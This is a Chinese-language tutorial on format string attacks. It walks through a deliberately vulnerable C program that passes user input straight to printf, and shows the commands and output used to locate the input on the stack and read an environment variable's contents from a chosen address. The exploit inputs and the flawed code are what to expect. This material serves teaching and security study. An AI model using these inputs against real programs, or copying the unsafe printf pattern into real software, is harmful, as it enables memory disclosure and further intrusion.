格式串攻击

漏洞目标代码：

//fmtstr.c
#include<stdlib.h>
int main(int argc,char *argv[]){
  static int canary=0;
  char temp[2048];
  strcpy(temp,argv[1]);
  printf(temp);
  printf("\n");
  printf("Canary at 0x%08x=0x%08x\n",&canary,canary);
}

 可以看出，漏洞代码允许用户指定printf的格式串，可自行构造

[root@Lynx gray]# ./fmtstr "AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x"
AAAA bffffa1a 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a 41414141

一直增加%08x，直到出现414141，也就是AAAA所在的栈的位置

当把最后一个%08x换成%s后会出现“段错误”

主要是%s试图读取内存的位置，用该位置的数据作为指针，指向别处，此处指向地址41414141，超出内存范围，所以会报错，由此可知，只要把这个地方换成任意正确的地址，就可以读取出这里保存的数据内容，也就是把"AAAA"替换成合法的内存地址。

获得某一环境变量的指针的辅助程序代码

//getenv.c
#include<stdlib.h>
int main(int argc,char *argv[])
{
  char *addr;
  addr=getenv(argv[1]);
  printf("%s is located at %p\n",argv[1],addr);
}

 [root@Lynx gray]# ./getenv SHELL
SHELL is located at 0xbffffa8c

可以看到保存SHELL的位置信息了，想获得具体内容吗？

[root@Lynx gray]# ./fmtstr `printf "\x8c\xfa\xff\xbf"`" %08x %08x %08x %08x %08x %08x %08x %08x %08x %s"  bffffa1c 00000200 464c457f 00010101 00000000 00000000 00030003 00000001 004eff0a /bin/bash

其中"/bin/bash"就是"0xbffffa8c"这个地址的内容，获得了SHELL环境变量的内容。